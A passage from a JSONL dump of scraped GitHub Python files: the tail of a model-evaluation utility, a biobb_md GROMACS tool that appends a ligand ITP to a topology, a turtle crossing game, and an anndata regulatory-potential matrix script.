input_text.split(\"\")[2]\n label_inference = label_text.split(\"answer\")[0]\n\n # calc inference length\n if predict is not None:\n #cleaned_predict_text = clean_text(predict_inference+\",\"+ predict_text)\n cleaned_predict_text = clean_text(\n predict_inference + predict_text)\n cleaned_label_text = clean_text(label_text)\n label_length_list.append(len(cleaned_label_text))\n predict_length_list.append(len(cleaned_predict_text))\n\n if predict is not None and (predict == label):\n acc_num += 1\n if clean_text(predict_inference) == clean_text(label_inference):\n inference_acc_num += 1\n del_analyze_flag = False\n print_format(f, input_text, label_text, predict_text)\n else:\n del_analyze_inference_err_flag = False\n print_format(f_inference_err, input_text,\n label_text, predict_text)\n elif predict is not None:\n del_analyze_err_flag = False\n print_format(f_err, input_text, label_text, predict_text)\n if step_index == 99:\n with open(over_file_path, \"w\") as f_over_err:\n print_format(f_over_err, input_text, label_text, predict_text)\n if del_analyze_flag:\n os.remove(analyze_file_path)\n if del_analyze_err_flag:\n os.remove(err_file_path)\n if del_analyze_inference_err_flag:\n os.remove(inference_err_file_path)\n\n return acc_num, inference_acc_num, calculated_list, predict_text_list, label_length_list, predict_length_list\n\n\ndef token_by_token_predict(input_id_list, predict_id_list, label_id_list, tokenizer, output_dir, step_index, model_name, label_length_list, predict_length_list):\n acc_num = 0\n inference_acc_num = 0\n calculated_list = []\n predict_text_list = []\n analyze_file_path = Path(output_dir) / Path(f'analyze_{step_index}.txt')\n err_file_path = Path(output_dir) / Path(f'analyze_err_{step_index}.txt')\n inference_err_file_path = Path(\n output_dir) / Path(f'analyze_inference_err_{step_index}.txt')\n over_file_path = Path(\n output_dir) / Path(f'analyze_over_err.txt')\n\n del_analyze_flag = True\n del_analyze_err_flag = True\n del_analyze_inference_err_flag = True\n with open(analyze_file_path, 'w') as f, open(err_file_path, 'w') as f_err, open(inference_err_file_path, \"w\") as f_inference_err:\n for input_ids, predict_ids, label_ids in zip(input_id_list, predict_id_list, label_id_list):\n label_ids[label_ids == -100] = tokenizer.pad_token_id\n if model_name == \"bart\":\n input_text, label_text, predict_text = multi_decode(\n tokenizer, [input_ids, label_ids[1:], predict_ids[2:]])\n elif model_name == \"t5\":\n input_text, label_text, predict_text = multi_decode(\n tokenizer, [input_ids, label_ids, predict_ids[1:]])\n predict_text_list.append(predict_text)\n\n bool_last_token = predict_text.startswith(\"\")\n\n predict = retrieve_last_string(input_text)\n calculated_list.append(bool_last_token)\n label = retrieve_last_string(label_text)\n\n predict_inference = input_text.split(\"\")[2]\n if bool_last_token:\n cleaned_predict_text = clean_text(predict_inference)\n cleaned_label_text = clean_text(label_text)\n label_length_list.append(len(cleaned_label_text))\n predict_length_list.append(len(cleaned_predict_text))\n\n if bool_last_token and (predict == label):\n acc_num += 1\n predict_inference_str = retrieve_inference(input_text)\n label_inference_str = retrieve_inference(\"\"+label_text)\n\n if predict_inference_str == label_inference_str:\n del_analyze_flag = False\n inference_acc_num += 1\n print_format(f, input_text, label_text, predict_text)\n else:\n del_analyze_inference_err_flag = False\n print_format(f_inference_err, input_text,\n label_text, predict_text)\n elif bool_last_token:\n del_analyze_err_flag = False\n print_format(f_err, input_text, label_text, predict_text)\n if step_index == 499:\n with open(over_file_path, \"w\") as f_over_err:\n print_format(f_over_err, input_text, label_text, predict_text)\n\n if del_analyze_flag:\n os.remove(analyze_file_path)\n if del_analyze_err_flag:\n os.remove(err_file_path)\n if del_analyze_inference_err_flag:\n os.remove(inference_err_file_path)\n\n return acc_num, inference_acc_num, calculated_list, predict_text_list, label_length_list, predict_length_list\n","repo_name":"ao1neko/reasoning-strategy","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33560761764","text":"#!/usr/bin/env python3\n\n\"\"\"Module containing the AppendLigand class and the command line interface.\"\"\"\nimport re\nimport argparse\nimport shutil\nfrom pathlib import Path\nfrom biobb_common.generic.biobb_object import BiobbObject\nfrom biobb_common.configuration import settings\nfrom biobb_common.tools import file_utils as fu\nfrom biobb_common.tools.file_utils import launchlogger\n\n\nclass AppendLigand(BiobbObject):\n \"\"\"\n | biobb_md AppendLigand\n | This class takes a ligand ITP file and inserts it in a topology.\n | This module automatizes the process of inserting a ligand ITP file in a GROMACS topology.\n\n Args:\n input_top_zip_path (str): Path the input topology TOP and ITP files zipball. File type: input. `Sample file `_. Accepted formats: zip (edam:format_3987).\n input_itp_path (str): Path to the ligand ITP file to be inserted in the topology. File type: input. `Sample file `_. Accepted formats: itp (edam:format_3883).\n output_top_zip_path (str): Path/Name the output topology TOP and ITP files zipball. File type: output. `Sample file `_. Accepted formats: zip (edam:format_3987).\n input_posres_itp_path (str) (Optional): Path to the position restriction ITP file. File type: input. Accepted formats: itp (edam:format_3883).\n properties (dic):\n * **posres_name** (*str*) - (\"POSRES_LIGAND\") String to be included in the ifdef clause.\n * **remove_tmp** (*bool*) - (True) [WF property] Remove temporal files.\n * **restart** (*bool*) - (False) [WF property] Do not execute if output files exist.\n\n Examples:\n This is a use example of how to use the building block from Python::\n\n from biobb_md.gromacs_extra.append_ligand import append_ligand\n prop = { 'posres_name': 'POSRES_LIGAND' }\n append_ligand(input_top_zip_path='/path/to/myTopology.zip',\n input_itp_path='/path/to/myTopologyAddOn.itp',\n output_top_zip_path='/path/to/newTopology.zip',\n properties=prop)\n\n Info:\n * wrapped_software:\n * name: In house\n * license: Apache-2.0\n * ontology:\n * name: EDAM\n * schema: http://edamontology.org/EDAM.owl\n \"\"\"\n\n def __init__(self, input_top_zip_path: str, input_itp_path: str, output_top_zip_path: str,\n input_posres_itp_path: str = None, properties: dict = None, **kwargs) -> None:\n properties = properties or {}\n\n # Call parent class constructor\n super().__init__(properties)\n\n # Input/Output files\n self.io_dict = {\n \"in\": {\"input_top_zip_path\": input_top_zip_path, \"input_itp_path\": input_itp_path,\n \"input_posres_itp_path\": input_posres_itp_path},\n \"out\": {\"output_top_zip_path\": output_top_zip_path}\n }\n\n # Properties specific for BB\n self.posres_name = properties.get('posres_name', 'POSRES_LIGAND')\n\n # Check the properties\n self.check_properties(properties)\n\n @launchlogger\n def launch(self) -> int:\n \"\"\"Execute the :class:`AppendLigand ` object.\"\"\"\n # Setup Biobb\n if self.check_restart(): return 0\n\n # Unzip topology\n top_file = fu.unzip_top(zip_file=self.io_dict['in'].get(\"input_top_zip_path\"), out_log=self.out_log)\n top_dir = str(Path(top_file).parent)\n itp_name = str(Path(self.io_dict['in'].get(\"input_itp_path\")).name)\n\n with open(top_file) as top_f:\n top_lines = top_f.readlines()\n top_f.close()\n fu.rm(top_file)\n\n forcefield_pattern = r'#include.*forcefield.itp\\\"'\n if top_lines:\n for index, line in enumerate(top_lines):\n if re.search(forcefield_pattern, line):\n break\n else:\n fu.log(f'FATAL: Input topfile {top_file} from input_top_zip_path {self.io_dict[\"in\"].get(\"input_top_zip_path\")} is empty.', self.out_log, self.global_log)\n return 1\n\n top_lines.insert(index+1, '\\n')\n top_lines.insert(index+2, '; Including ligand ITP\\n')\n top_lines.insert(index+3, '#include \"' + itp_name + '\"\\n')\n top_lines.insert(index+4, '\\n')\n if self.io_dict['in'].get(\"input_posres_itp_path\"):\n top_lines.insert(index+5, '; Ligand position restraints'+'\\n')\n top_lines.insert(index+6, '#ifdef '+self.posres_name+'\\n')\n top_lines.insert(index+7, '#include \"'+str(Path(self.io_dict['in'].get(\"input_posres_itp_path\")).name)+'\"\\n')\n top_lines.insert(index+8, '#endif'+'\\n')\n top_lines.insert(index+9, '\\n')\n\n inside_moleculetype_section = False\n with open(self.io_dict['in'].get(\"input_itp_path\")) as itp_file:\n moleculetype_pattern = r'\\[ moleculetype \\]'\n for line in itp_file:\n if re.search(moleculetype_pattern, line):\n inside_moleculetype_section = True\n continue\n if inside_moleculetype_section and not line.startswith(';'):\n moleculetype = line.strip().split()[0].strip()\n break\n\n molecules_pattern = r'\\[ molecules \\]'\n inside_molecules_section = False\n index_molecule = None\n molecule_string = moleculetype+(20-len(moleculetype))*' '+'1'+'\\n'\n for index, line in enumerate(top_lines):\n if re.search(molecules_pattern, line):\n inside_molecules_section = True\n continue\n if inside_molecules_section and not line.startswith(';') and line.upper().startswith('PROTEIN'):\n index_molecule = index\n\n if index_molecule:\n top_lines.insert(index_molecule+1, molecule_string)\n else:\n top_lines.append(molecule_string)\n\n new_top = fu.create_name(path=top_dir, prefix=self.prefix, step=self.step, name='ligand.top')\n\n with open(new_top, 'w') as new_top_f:\n new_top_f.write(\"\".join(top_lines))\n\n shutil.copy2(self.io_dict['in'].get(\"input_itp_path\"), top_dir)\n if self.io_dict['in'].get(\"input_posres_itp_path\"):\n shutil.copy2(self.io_dict['in'].get(\"input_posres_itp_path\"), top_dir)\n\n # zip topology\n fu.log('Compressing topology to: %s' % self.io_dict['out'].get(\"output_top_zip_path\"), self.out_log, self.global_log)\n fu.zip_top(zip_file=self.io_dict['out'].get(\"output_top_zip_path\"), top_file=new_top, out_log=self.out_log)\n\n # Remove temporal files\n self.tmp_files.append(top_dir)\n self.remove_tmp_files()\n\n return 0\n\n\ndef append_ligand(input_top_zip_path: str, input_itp_path: str, output_top_zip_path: str,\n input_posres_itp_path: str = None, properties: dict = None, **kwargs) -> int:\n \"\"\"Create :class:`AppendLigand ` class and\n execute the :meth:`launch() ` method.\"\"\"\n return AppendLigand(input_top_zip_path=input_top_zip_path,\n input_itp_path=input_itp_path,\n output_top_zip_path=output_top_zip_path,\n input_posres_itp_path=input_posres_itp_path,\n properties=properties, **kwargs).launch()\n\n\ndef main():\n \"\"\"Command line execution of this building block. Please check the command line documentation.\"\"\"\n parser = argparse.ArgumentParser(description=\"Wrapper of the GROMACS editconf module.\",\n formatter_class=lambda prog: argparse.RawTextHelpFormatter(prog, width=99999))\n parser.add_argument('-c', '--config', required=False, help=\"This file can be a YAML file, JSON file or JSON string\")\n\n # Specific args of each building block\n required_args = parser.add_argument_group('required arguments')\n required_args.add_argument('--input_top_zip_path', required=True)\n required_args.add_argument('--input_itp_path', required=True)\n required_args.add_argument('--output_top_zip_path', required=True)\n parser.add_argument('--input_posres_itp_path', required=False)\n\n args = parser.parse_args()\n config = args.config if args.config else None\n properties = settings.ConfReader(config=config).get_prop_dic()\n \n # Specific call of each building block\n append_ligand(input_top_zip_path=args.input_top_zip_path, input_itp_path=args.input_itp_path,\n output_top_zip_path=args.output_top_zip_path, input_posres_itp_path=args.input_posres_itp_path,\n properties=properties)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bioexcel/biobb_md","sub_path":"biobb_md/gromacs_extra/append_ligand.py","file_name":"append_ligand.py","file_ext":"py","file_size_in_byte":9019,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"}
+{"seq_id":"26716971366","text":"from turtle import Screen\nfrom my_turtle import My_turtle\nfrom cars import Car\nfrom level_board import Level\nimport random\nimport time\n\nstart_time = time.time()\ninterval = 2\n\nscreen = Screen()\nscreen.tracer(0)\n\nscreen.colormode(255)\neo = My_turtle(screen)\nlevels = Level(screen)\nscreen.onkey(eo.move, \"w\")\nscreen.listen()\n\nlevel = 0.1\n\ncars = []\nfor i in range(5):\n car = Car(screen)\n cars.append(car)\n\nis_on = True\nwhile is_on:\n screen.update()\n\n random_range = random.randint(4, 7)\n\n current_time = time.time()\n\n if current_time - start_time >= interval:\n for i in range(random_range):\n car = Car(screen)\n cars.append(car)\n start_time = current_time\n\n for i in cars:\n i.move()\n\n if eo.collision(cars):\n # It'll be good to correct collisions, to be more visible and understandable\n eo.move()\n screen.update()\n levels.game_over()\n break\n\n if eo.finish(screen):\n eo.start_pos(screen)\n levels.change_level()\n\n for i in cars:\n i.hideturtle()\n cars.clear()\n\n level *= 0.8\n interval *= 0.8\n\n time.sleep(level)\n\nscreen.exitonclick()\n","repo_name":"Wojtke7/100-Days-of-code-Python","sub_path":"Day 23 Turtle crossing/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22375523809","text":"import os\nimport sys\n\nimport anndata as ad\nimport numpy as np\n\n\nclass CalcTRSampleRPMatrix:\n def __init__(self, library='library', output='library', type='H3K27ac'):\n self.data_ad_sample = ad.read_h5ad(\n os.path.join(library, f'RP_Matrix_{type}.h5ad')\n )\n self.data_ad_TR = ad.read_h5ad(os.path.join(library, 'RP_Matrix_TR.h5ad'))\n self.A = ad.read_h5ad(os.path.join(library, f'A_pred_{type}.h5ad'))\n self.A.X[np.diag_indices_from(self.A.X)] = 0\n i = self.data_ad_TR.shape[0]\n self.A = self.A[:i, i:]\n self.library = library\n self.output = output\n self.type = type\n\n def run(self):\n self.A = self.A.to_df().values\n self.A[self.A < 0.0] = 0\n self.X = self.data_ad_sample.to_df().values\n self.A = self.A / (np.sum(self.A, axis=1, keepdims=True) + 1e-17)\n self.X = self.X / (np.linalg.norm(self.X, axis=1, keepdims=True) + 1e-17)\n matrix = self.A.dot(self.X)\n data_ad = ad.AnnData(\n matrix, obs=self.data_ad_TR.obs, var=self.data_ad_TR.var, dtype='float32'\n )\n data_ad.write_h5ad(os.path.join(self.library, f'RP_Matrix_TR_{self.type}.h5ad'))\n\n\nif __name__ == '__main__':\n type = sys.argv[1]\n library = sys.argv[2]\n assert type in ['H3K27ac', 'ATAC']\n print(f'\\033[1;31m # # # CalcTRSampleRPMatrix # # #\\033[0m')\n CalcTRSampleRPMatrix(library=library, output=library, type=type).run()\n","repo_name":"LicLab-bio/TRAPT","sub_path":"src/TRAPT/CalcTRSampleRPMatrix.py","file_name":"CalcTRSampleRPMatrix.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}